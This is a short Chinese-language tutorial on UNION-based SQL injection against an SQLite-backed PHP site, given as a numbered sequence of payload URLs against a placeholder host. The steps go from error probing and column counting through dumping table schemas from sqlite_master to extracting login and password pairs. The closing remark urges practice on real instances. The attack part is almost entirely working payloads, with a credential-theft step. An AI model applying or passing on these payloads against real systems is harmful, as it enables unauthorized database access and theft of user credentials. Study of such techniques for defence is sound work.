Sql注入入门 之 Sqlite3常规注入 [ Union方式 ]
1,本次 sqlite3 实例注入点,如下:1
http://vuln.com/index.php?id=50&ca=7
2,依旧是迷人的单引号,尝试干扰id参数,返回sqlite数据库报错,具体报错信息如下1
http://vuln.com/index.php?id=50'&ca=7
3,尝试闭合1
http://vuln.com/index.php?id=50 and 1=1 &ca=7 条件为真时,页面返回正常,数字型注入
1 | http://vuln.com/index.php?id=50 and 1=112 &ca=7 条件为假时,页面 |
4,查询当前表中的字段个数1
http://vuln.com/index.php?id=50 order by 38 &ca=7 个数为38时返回正常
1 | http://vuln.com/index.php?id=50 order by 39 &ca=7 个数为39时返回错误,说明当前表存在38个字段 |
8,执行union爆出对应的数据显示位,这个的显示位稍微有点儿跑偏,数据显示位在title标记里,你可以右键源代码进行查看1
http://vuln.com/index.php?id=50 and 1=123 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38--&ca=7
9,有了数据位,接下来正常的查数据就可以了,还是先搜集下数据库信息,获取当前sqlite版本1
http://vuln.com/index.php?id=50 and 1=123 UNION SELECT 1,sqlite_version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38--&ca=7
10,查出所有表名,这里可以用burpsuite来跑比较方便1
http://vuln.com/index.php?id=50 and 1=123 UNION SELECT 1,name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 FROM sqlite_master WHERE type='table' limit 0,1 --&ca=7
11,直接一次性查出所有表名及每张表所对应的表结构1
http://vuln.com/index.php?id=50 and 1=123 UNION SELECT 1,sql,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 FROM sqlite_master WHERE type='table' limit 0,1 --&ca=7
12,查出对应字段下的账号密码数据1
http://vuln.com/index.php?id=50 and 1=123 UNION SELECT 1,login||'::'||pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 FROM utilisateurs limit 0,1 --&ca=7
一点小结:
关于sqlite注入实在没什么好说的,非常简单,作为access的替代品,在注入方式上几乎没什么不同,多找实例练习即可……
